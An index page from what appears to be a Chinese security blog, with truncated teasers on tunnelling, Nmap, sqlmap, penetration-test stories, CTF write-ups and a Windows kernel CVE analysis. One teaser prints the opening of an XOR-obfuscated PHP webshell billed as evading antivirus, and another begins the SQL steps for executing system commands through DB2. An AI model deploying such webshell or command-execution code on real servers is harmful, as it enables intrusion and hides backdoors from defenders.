-
reGeorg+Proxifier内网穿透教程
reGeorg是reDuh的继承者,利用了会话层的socks5协议,结合Proxifier使用效率会更高。 reGeorg该文件下支持php,asp,jsp,aspx; Proxifier是一款功能非常强大的socks5客户端,可以让不支持通过代理服务器工作的网络程序能通过HTTPS或SOCKS代理或代理链。 1、下载并安装reGeorg与proxifier; 2、将脚本上传到外网服务器端,我这里…- 0
- 0
- 1.9k
-
Nmap中一些常用的脚本
我们将研究最著名的渗透工具之一 Nmap 一款标志性的跨平台扫描器。它的原意为Network Mapper(网络映射器),具有相当强大的扫描功能,几乎适用于任何渗透场景。不少人甚至认为它就是全球最好的扫描软件。除了常规的网络扫描,Nmap还可根据NSE (Nmap scripting Engine)的脚本进行大量渗透工作,这种脚本是基于Lua编程语言,有点像javascript。正是NSE,使得…- 1
- 0
- 782
-
记一次从车库到核心网段的渗透之路
0x00 前言 前段时间做了个渗透测试的项目,其过程中与常规渗透测试略有不同。在这次渗透过程从外网WEB应用无任何进展后团队尝试了实地渗透的方式。最终从实地一点一点扩展到目标核心网络,过程中走了不少弯路,也有不少有趣的经历。因涉及相关部门敏感信息,这里只大致记录下过程,打重码,部分细节需自行脑补。 0x01 公共WiFi到内网 从决定实地渗透开始,从WiFi打入口点就是团队首要目标。经过一天的踩点…- 1
- 0
- 439
-
挖洞技巧-扩展攻击面
0x00 前言 在挖洞过程中,我们经常忽略一些攻击面,但是这些被忽略的攻击面很大概率就是存在漏洞的。因为比较明显的攻击面被大多数人来回测试了几次,因此我们需要寻找一些很少人挖的地方进行挖掘。 0x01 更多的资产 可以通过空间引擎搜索一些特殊的cookie以及header头来发现目标更多资产(也以此搜索到同类的网站确认使用什么系统)。 可以通过改变user-agent、host、甚至通过来源ip(…- 1
- 1
- 65
-
-
-
一次简单的sqlmap工具注入实战
最近在学习网络安全,挖洞避免不了要使用许多工具,使用著名注入工具sqlmap的时候,对于英语不怎么好的我就比较难受了,本来就不会使用,加之又是英语的,简直难受。上网找了好多详细教程,但是命令实在是太多,感觉自己不可能一下就全部学会,于是决定一点一点慢慢来,用实战来慢慢熟悉这个工具的使用-----我相信通过每一次的记录我会慢慢变强! 这是墨者学院一个SQL注入漏洞靶场:http://123.123.…- 1
- 0
- 537
-
日常渗透测试搞站记录
DB2 数据库权限执行系统命令 记录一下拿到db2数据库权限之后,进行系统命令执行的过程,db2默认绑定的是50000端口: 1、创建一个临时的表 CREATE TABLE 数据库名.表名 ( test VARCHAR (500) ) ; 2、创建存储过程(windows) CREATE PROCEDURE db2_cmd_exec (IN cmd varchar(200)) EXTERNAL N…- 1
- 0
- 449
-
从PHP源码与扩展开发谈PHP任意代码执行与防御
PHP的灵活性极强,其可以通过各种意想不到的办法来动态执行代码。正因如此,PHP界的“一句话木马”(“后门”,backdoor),写法极其神奇,充满了脑洞,大部分变种完全无法通过静态扫描查到(当然如果用沙盒执行+启发式拦截的方式大概可以,这就变成传统杀毒软件了)。因此,我们不如从这些一句话木马,看看PHP是如何执行动态代码的吧。 先说明,如果只是要在自己服务器上防御的话,可以只看下面几行后关闭这篇…- 0
- 0
- 561
-
-
宝塔面板出现严重数据库鉴权漏洞,官方发布紧急安全更新
发现这次更新可以直接从特定地址登录到数据库中的严重错误,以修复phpmyadmin的未验证。 有安全漏洞的面板为linux面板版本7.4.2、Windows面板版本6.8。 现在宝塔官方应用最新的补丁,大家升级到最新版本即可。 修复方案 1请立即升级到宝塔最新版2,关闭888端口 如果打了补丁之后,还是不放心,可以删除phpmyadmin!!! 如何知道自己是否被扫? 进入宝塔网站日志 /www/…- 0
- 0
- 482
-
转发收藏!这10类钓鱼网站要格外警惕
据12321网络不良与垃圾信息举报受理中心 2月份网民举报短信、邮件、网站等信息,安全君将前10名钓鱼网站汇总如下,各位看官切勿轻易泄露个人信息,避免上当受骗。1、假冒苹果公司。案例:【Apple售后】您好,您丢失的苹果设备正在苹果售后中心申请办理换机业务,因该用户无法提供购机凭证已暂扣此设备,我们特此与您联系。请登陆:www.idax-gps.cn/sh 验证身份信息,验证成功我们将联系您取回手…- 0
- 0
- 613
-
白名单bulid执行绕过云锁安全狗套装360套装提权进服务器
0x00 前言 退出一线渗透测试也有2个多月了,感觉不搞技术的日子不太好过,心里空虚,烦恼,而又让人觉得无趣,借用兄弟们一句话说就是日了狗了,人一辈子最大的悲哀莫过于,中年失业,虽然我也不是失业,但是我这的尴尬比失业都尴尬、悲哀,所以,这些话谨献给那些奋斗在一线的,特别是乙方一线的渗透人员,希望你们要规划好自己的人生道路,以我为诫,到了中年犹如寒号鸟的哀鸣,又如野狼的嚎叫叫声,凄惨惨,悲戚戚,好不…- 0
- 0
- 956
-
揭露电信诈骗之悄无声息的转走资金
近几年电信诈骗事件层出不穷,针对2019年6月13日发生的电信诈骗案例“我被电信诈骗53万!却无从追回”。暗影实验室通过分析该案例中涉及的仿冒APP来揭露案件面貌还原真相,以提醒更多用户谨慎下载使用来路不明的应用,防止个人隐私泄露。 案例链接:我被电信诈骗53万!却无从追回 该应用安装启动后会监视和控制用户手机,并上传表单页面输入的***号、账号密码等重要数据,同时上传用户设备中联系人、短信等隐私…- 0
- 0
- 553
-
-
第五届XCTF总决赛的赛制以及新型攻防赛题之探索
今年,我们r3kapig战队接下了蓝莲花的接力棒,作为亚洲最大的CTF联赛XCTF联赛总决赛的命题方。这次命题的总负责和协调是由我们战队的@Anciety完成。XCTF作为一个老牌联赛赛事已经有了5年的历史,积累了不少口碑,这次承担命题工作对于我们来说也是颇有压力,为此我们也在内部开过几次会议讨论这次比赛的赛题和赛制设计。讨论的结果将在这个文章中呈现。 赛制 首先我们谈一谈赛制,一般来说,常见的C…- 0
- 0
- 990
-
污染TensorFlow模型: XCTF 2019 Final tfboys命题思路
TensorFlow 加载模型时的安全风险 Tensorflow用数据流图(dataflow graph)来表示计算模型,结点(node)表示计算操作(operation)。 常规的operation多用来表达计算(加减乘除),此外还有两种特殊的operation:read_file() 和 write_file() ,他们可以在模型运行时操纵文件的读写,导致安全风险。攻击者可以将训练好的模型中插…- 0
- 0
- 798
-
-
最新Webshell免杀PHP一句话变种
前言 最新免杀php变种一句话,亲测过啊D,不知道什么时候加入特征库报毒,反正现在能用吧。 class VMTX{ function __destruct(){ $BRLI='f$vjcT'^"\x7\x57\x5\xf\x11\x20"; return @$BRLI("$this->EKDL"); } } $vmtx=new VM…- 0
- 0
- 2.5k
-
-
关于CVE-2019-0808内核提权漏洞的成因分析
2019年3月微软发布的补丁修复了两个在野Windows零日漏洞,其中CVE-2019-0808是由谷歌威胁分析小组发现并向微软提交。 据微软称,这个影响Win32k组件的漏洞允许攻击者提升权限并在内核模式下执行任意代码。谷歌表示,该漏洞只影响Windows 7和Windows Server 2008,由于微软在最新版本的操作系统中引入了漏洞利用缓解措施,因此Windows 10不会受到影响。但是…- 0
- 0
- 568
-
¥优惠劵使用时效:无法使用使用时效:
之前
使用时效:永久有效优惠劵ID:×